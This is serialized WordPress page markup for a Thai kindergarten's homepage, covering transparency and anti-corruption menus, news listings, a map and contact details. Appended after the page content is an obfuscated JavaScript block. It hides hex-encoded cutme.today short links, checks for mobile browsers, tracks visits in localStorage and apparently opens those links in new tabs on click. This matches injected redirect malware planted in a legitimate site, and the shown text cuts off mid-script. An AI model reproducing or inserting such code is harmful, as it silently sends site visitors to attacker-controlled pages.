100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return 